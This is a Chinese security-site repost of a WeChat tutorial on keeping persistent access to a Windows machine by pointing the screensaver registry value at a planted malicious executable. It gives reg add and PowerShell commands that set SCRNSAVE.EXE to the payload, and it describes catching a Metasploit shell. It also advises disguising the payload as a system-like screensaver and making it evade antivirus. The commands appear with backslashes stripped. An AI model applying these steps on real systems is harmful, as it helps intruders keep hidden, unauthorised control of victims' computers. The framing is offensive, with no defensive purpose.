1. 威客安全首页
  2. 安全资讯

原创干货 | 利用屏幕保护程序进行权限维持

0x00:简介

1、屏幕保护程序,当初的设计是为了防止长期屏幕的显示,预防老化与缩短屏幕显示器老化的一种保护程序。

2、攻击者可以利用屏幕保护程序来隐藏shell,达到一定的权限维持。

3、如果想长期隐藏,请作免杀处理

0x01:过程

1、屏幕保护的存放位置

Win32

原创干货 | 利用屏幕保护程序进行权限维持

Win64

原创干货 | 利用屏幕保护程序进行权限维持

2、制作恶意程序

原创干货 | 利用屏幕保护程序进行权限维持

然后放至受者的电脑上(我这里是放到了C盘的tmp下)

3、通过CMD来植入恶意程序(注:本机测试请先备份好注册表)

利用代码:regadd “hkcucontrol paneldesktop” /v SCRNSAVE.EXE /dc:tmpjjj.exe

原创干货 | 利用屏幕保护程序进行权限维持

原创干货 | 利用屏幕保护程序进行权限维持

原创干货 | 利用屏幕保护程序进行权限维持

投放完毕

4、设置监听

原创干货 | 利用屏幕保护程序进行权限维持

执行exploit

等待一分钟

原创干货 | 利用屏幕保护程序进行权限维持

shell到手

5、通过powershell来植入恶意程序(注:本机测试请先备份好注册表)

利用代码:

New-ItemProperty -Path ‘HKCU:Control PanelDesktop’ -Name’SCRNSAVE.EXE’ -Value ‘c:tmpjjj.exe’

执行前

原创干货 | 利用屏幕保护程序进行权限维持

执行后

原创干货 | 利用屏幕保护程序进行权限维持

原创干货 | 利用屏幕保护程序进行权限维持

投放完毕

MSF设置完监听

执行exploit

等待一分钟

原创干货 | 利用屏幕保护程序进行权限维持

shell到手

0x02:后话

1、就是用户在线使用电脑的情况下,是不会启动屏幕保护程序的,也就是说恶意程序会不起作用。

2、这种程序很容易就会被发现,建议可以做成跟系统相似的屏幕保护程序,便于隐藏。

3、建议做免杀处理

4、敌不动,我动。敌动,我不动

原创干货 | 利用屏幕保护程序进行权限维持

● 云众可信征稿进行时

● 原创干货 | 暗网知识小科普

● 原创干货 | 未授权访问漏洞批量化

● 云众VLOG | 谁说我们是修电脑的?

·END·

云众可信
原创·干货·一起玩

原创干货 | 利用屏幕保护程序进行权限维持

微信号:yunzhongkexin

好看的人才能点
原创干货 | 利用屏幕保护程序进行权限维持

原文始发于微信公众号(云众可信):原创干货 | 利用屏幕保护程序进行权限维持

本文转为转载文章,本文观点不代表威客安全立场。

发表评论

登录后才能评论

联系我们

15110186328

在线咨询:点击这里给我发消息

邮件:zhanglei@jinlongsec.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code
X